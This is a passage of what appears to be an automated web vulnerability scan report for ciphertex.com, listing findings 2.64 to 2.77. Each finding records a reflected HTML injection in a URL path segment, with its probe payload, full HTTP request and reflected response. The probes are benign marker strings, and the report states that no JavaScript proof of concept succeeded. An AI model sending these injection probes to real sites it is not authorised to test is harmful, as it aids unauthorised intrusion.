<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-cck-modules-fieldgroup-77d66"><a>596ac13dd54" class="section-sites sidebar-none">
...[SNIP]...

2.64. http://www.ciphertex.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee26c"><a>7338ae6f861 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/cck/theme/content-module.cssee26c"><a>7338ae6f861?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:41 GMT
Vary: Accept-Encoding
Content-Length: 10041
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-cck-theme-content-module.cssee26c"><a>7338ae6f861" class="section-sites sidebar-none">
...[SNIP]...

2.65. http://www.ciphertex.com/sites/all/modules/custom_module/ciphertex.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/custom_module/ciphertex.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13980"><a>17c7c4d864f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/custom_module/ciphertex.js13980"><a>17c7c4d864f?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:07 GMT
Vary: Accept-Encoding
Content-Length: 10037
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-custom_module-ciphertex.js13980"><a>17c7c4d864f" class="section-sites sidebar-none">
...[SNIP]...

2.66. http://www.ciphertex.com/sites/all/modules/date/date_popup/themes/jquery.timeentry.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/date/date_popup/themes/jquery.timeentry.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8009"><a>5c6d01fe2e4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/date/d8009"><a>5c6d01fe2e4/themes/jquery.timeentry.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:55 GMT
Vary: Accept-Encoding
Content-Length: 10051
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-date-d8009"><a>5c6d01fe2e4-themes-jquery.timeentry.css" class="section-sites sidebar-none">
...[SNIP]...

2.67. http://www.ciphertex.com/sites/all/modules/filefield/filefield.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac75c"><a>660fd2b4a63 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/filefieldac75c"><a>660fd2b4a63/filefield.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:09 GMT
Vary: Accept-Encoding
Content-Length: 10031
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-filefieldac75c"><a>660fd2b4a63-filefield.css" class="section-sites sidebar-none">
...[SNIP]...

2.68. http://www.ciphertex.com/sites/all/modules/galleria/inc/galleria.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/galleria/inc/galleria.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31b37"><a>f41e3e3235 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites31b37"><a>f41e3e3235/all/modules/galleria/inc/galleria.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/CX-RANGER-E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:14 GMT
Vary: Accept-Encoding
Content-Length: 10053
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites31b37"><a>f41e3e3235-all-modules-galleria-inc-galleria.css" class="section-sites31b37">
...[SNIP]...

2.69. http://www.ciphertex.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/jquery_update/replace/jquery.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6700"><a>633fc2753a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a6700"><a>633fc2753a2/all/modules/jquery_update/replace/jquery.min.js?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:29 GMT
Vary: Accept-Encoding
Content-Length: 10061
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-a6700"><a>633fc2753a2-all-modules-jquery_update-replace-jquery.min.js" class="section-a6700">
...[SNIP]...

2.70. http://www.ciphertex.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/jquery_update/replace/jquery.min.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 733fd"><a>90f5d522738 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/jquery_update/replace/jquery.min.js733fd"><a>90f5d522738?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:08 GMT
Vary: Accept-Encoding
Content-Length: 10055
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-jquery_update-replace-jquery.min.js733fd"><a>90f5d522738" class="section-sites sidebar-none">
...[SNIP]...

2.71. http://www.ciphertex.com/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9925"><a>9bfb48c88ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitese9925"><a>9bfb48c88ba/all/modules/logintoboggan/logintoboggan.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:31 GMT
Vary: Accept-Encoding
Content-Length: 10068
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sitese9925"><a>9bfb48c88ba-all-modules-logintoboggan-logintoboggan.css" class="section-sitese9925">
...[SNIP]...

2.72. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/print/css/printlinks.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58eb2"><a>af294686ceb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /58eb2"><a>af294686ceb/all/modules/print/css/printlinks.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:25 GMT
Vary: Accept-Encoding
Content-Length: 10039
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-58eb2"><a>af294686ceb-all-modules-print-css-printlinks.css" class="section-58eb2">
...[SNIP]...

2.73. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/print/css/printlinks.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63f63"><a>93577d2105f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules63f63"><a>93577d2105f/print/css/printlinks.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:36 GMT
Vary: Accept-Encoding
Content-Length: 10033
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules63f63"><a>93577d2105f-print-css-printlinks.css" class="section-sites sidebar-none">
...[SNIP]...

2.74. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/print/css/printlinks.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56553"><a>a1c944e5b2e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/print/56553"><a>a1c944e5b2e/printlinks.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:51 GMT
Vary: Accept-Encoding
Content-Length: 10027
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-print-56553"><a>a1c944e5b2e-printlinks.css" class="section-sites sidebar-none">
...[SNIP]...

2.75. http://www.ciphertex.com/sites/all/modules/tabs/drupal-tabs.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/tabs/drupal-tabs.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94af3"><a>651da2295d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites94af3"><a>651da2295d2/all/modules/tabs/drupal-tabs.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/CX-RANGER-E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:57 GMT
Vary: Accept-Encoding
Content-Length: 10046
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites94af3"><a>651da2295d2-all-modules-tabs-drupal-tabs.css" class="section-sites94af3">
...[SNIP]...

2.76. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73aab"><a>cc61c204163 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart73aab"><a>cc61c204163/shipping/uc_quote/uc_quote.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:04 GMT
Vary: Accept-Encoding
Content-Length: 10063
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart73aab"><a>cc61c204163-shipping-uc_quote-uc_quote.css" class="section-sites sidebar-none">
...[SNIP]...

2.77. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a5e"><a>6fbabd2ed7f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/shipping/uc_quoteb1a5e"><a>6fbabd2ed7f/uc_quote.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:19 GMT
Vary: Accept-Encoding
Content-Length: 10063
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
